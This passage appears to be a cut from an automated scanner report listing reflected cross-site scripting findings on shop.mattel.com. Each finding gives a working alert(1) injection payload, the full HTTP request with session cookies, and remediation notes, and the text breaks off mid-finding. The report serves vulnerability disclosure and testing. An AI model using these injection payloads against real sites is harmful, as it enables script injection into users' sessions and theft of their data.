GET /home/index.jsp?locale=es_USa4b57"-alert(1)-"f7a8c4aca52 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:14:57 GMT Server: Apache/2.0.63 (Unix) X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 45424
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN ...[SNIP]... <script type="text/javascript"> if(ess){}else{ var ess = {}; }
The value of the locale request parameter is copied into an HTML comment. The payload 2478f--><script>alert(1)</script>76d14968a7c was submitted in the locale parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /home/index.jsp?locale=es_US2478f--><script>alert(1)</script>76d14968a7c HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:14:59 GMT Server: Apache/2.0.63 (Unix) X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 45472
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN ...[SNIP]... <!-- === Request Query String: locale=es_US2478f--><script>alert(1)</script>76d14968a7c --> ...[SNIP]...
1.39. http://shop.mattel.com/home/index.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://shop.mattel.com
Path:
/home/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload cd009--><script>alert(1)</script>6d63d6430fa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /home/index.jsp?cd009--><script>alert(1)</script>6d63d6430fa=1 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:14:51 GMT Server: Apache/2.0.63 (Unix) X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 45420
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/T ...[SNIP]... <!-- === Request Query String: cd009--><script>alert(1)</script>6d63d6430fa=1 --> ...[SNIP]...
1.40. http://shop.mattel.com/home/index.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://shop.mattel.com
Path:
/home/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5513"-alert(1)-"f377ef9f75a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /home/index.jsp?a5513"-alert(1)-"f377ef9f75a=1 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:14:49 GMT Server: Apache/2.0.63 (Unix) X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 45089
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/T ...[SNIP]... <script type="text/javascript"> if(ess){}else{ var ess = {}; }
The value of the cp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53258"-alert(1)-"114d4ef9b54 was submitted in the cp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /product/index.jsp?productId=4199678&cp=3719987.3741284.374127853258"-alert(1)-"114d4ef9b54 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:12:45 GMT Server: Apache/2.0.63 (Unix) Cache-Control: no-cache="set-cookie" P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml" Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; expires=Tuesday, 10-Jan-2079 03:26:52 GMT; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 36580
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
...[SNIP]... text/javascript"> if(ess){}else{ var ess = {}; }
The value of the cp request parameter is copied into an HTML comment. The payload d67b6--><script>alert(1)</script>c8c1a5320e3 was submitted in the cp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /product/index.jsp?productId=4199678&cp=3719987.3741284.3741278d67b6--><script>alert(1)</script>c8c1a5320e3 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:12:46 GMT Server: Apache/2.0.63 (Unix) Cache-Control: no-cache="set-cookie" P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml" Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; expires=Tuesday, 10-Jan-2079 03:26:53 GMT; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 36612
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1.43. http://shop.mattel.com/product/index.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://shop.mattel.com
Path:
/product/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload babdb--><script>alert(1)</script>332e4ffe94 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /product/index.jsp?productId=4199678&babdb--><script>alert(1)</script>332e4ffe94=1 HTTP/1.1 Host: shop.mattel.com Proxy-Connection: keep-alive Referer: http://www.barbie.com/videogirl/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=46650939.1293081033.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=46650939.544434872.1293081033.1293081033.1293081033.1; __utmc=46650939
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:12:38 GMT Server: Apache/2.0.63 (Unix) Cache-Control: no-cache="set-cookie" P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml" Set-Cookie: JSESSIONID=jsx3NSTW0ThmFQdF2nz80hkG10LQN52LGC89LfycTTn9WzHlzvxm!-1434729825; path=/ Set-Cookie: browser_id=118201222464; expires=Sunday, 20-Dec-2020 00:12:38 GMT; path=/ Set-Cookie: browser_id=118201222464; expires=Sunday, 20-Dec-2020 00:12:38 GMT; path=/ Set-Cookie: browser_id=118201222464; expires=Sunday, 20-Dec-2020 00:12:38 GMT; path=/ Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; expires=Tuesday, 10-Jan-2079 03:26:45 GMT; path=/ Set-Cookie: browser_id=118201222464; expires=Sunday, 20-Dec-2020 00:12:38 GMT; path=/ Set-Cookie: browser_id=118201222464; expires=Sunday, 20-Dec-2020 00:12:38 GMT; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 54410
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1.44. http://shop.mattel.com/product/index.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://shop.mattel.com
Path:
/product/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1cc08"-alert(1)-"8a2c85cf2ad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /product/index.jsp?productId=4199678&1cc08"-alert(1)-"8a2c85cf2ad=1 HTTP/1.1 Host: shop.mattel.com Proxy-Connection: keep-alive Referer: http://www.barbie.com/videogirl/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=46650939.1293081033.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=46650939.544434872.1293081033.1293081033.1293081033.1; __utmc=46650939
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:12:34 GMT Server: Apache/2.0.63 (Unix) Cache-Control: no-cache="set-cookie" P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml" Set-Cookie: JSESSIONID=CyQ2NSTSyvhGDxW9mLkXPrJrLljhvJTfK4WtPV9v1cD6VrL85yf1!755340761; path=/ Set-Cookie: browser_id=118201491784; expires=Sunday, 20-Dec-2020 00:12:34 GMT; path=/ Set-Cookie: browser_id=118201491784; expires=Sunday, 20-Dec-2020 00:12:34 GMT; path=/ Set-Cookie: browser_id=118201491784; expires=Sunday, 20-Dec-2020 00:12:34 GMT; path=/ Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; expires=Tuesday, 10-Jan-2079 03:26:41 GMT; path=/ Set-Cookie: browser_id=118201491784; expires=Sunday, 20-Dec-2020 00:12:34 GMT; path=/ Set-Cookie: browser_id=118201491784; expires=Sunday, 20-Dec-2020 00:12:34 GMT; path=/ X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 54343
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
...[SNIP]... <script type="text/javascript"> if(ess){}else{ var ess = {}; }
1.45. http://shop.mattel.com/productAlerts/index.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://shop.mattel.com
Path:
/productAlerts/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 71d78--><script>alert(1)</script>e4fc885191d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /productAlerts/index.jsp?71d78--><script>alert(1)</script>e4fc885191d=1 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:15:29 GMT Server: Apache/2.0.63 (Unix) Cache-Control: no-cache Pragma: no-cache P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml" X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 36572
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1.46. http://shop.mattel.com/productAlerts/index.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://shop.mattel.com
Path:
/productAlerts/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5dca1"-alert(1)-"291191fc800 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /productAlerts/index.jsp?5dca1"-alert(1)-"291191fc800=1 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:15:28 GMT Server: Apache/2.0.63 (Unix) Cache-Control: no-cache Pragma: no-cache P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml" X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 36540
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
...[SNIP]... <script type="text/javascript"> if(ess){}else{ var ess = {}; }
1.47. http://shop.mattel.com/reviews/submitReview.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://shop.mattel.com
Path:
/reviews/submitReview.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a7fe"-alert(1)-"d845562a2b8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /reviews/submitReview.jsp?7a7fe"-alert(1)-"d845562a2b8=1 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:15:29 GMT Server: Apache/2.0.63 (Unix) X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 37606
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt ...[SNIP]... <script type="text/javascript"> if(ess){}else{ var ess = {}; }
1.48. http://shop.mattel.com/reviews/submitReview.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://shop.mattel.com
Path:
/reviews/submitReview.jsp
Issue detail
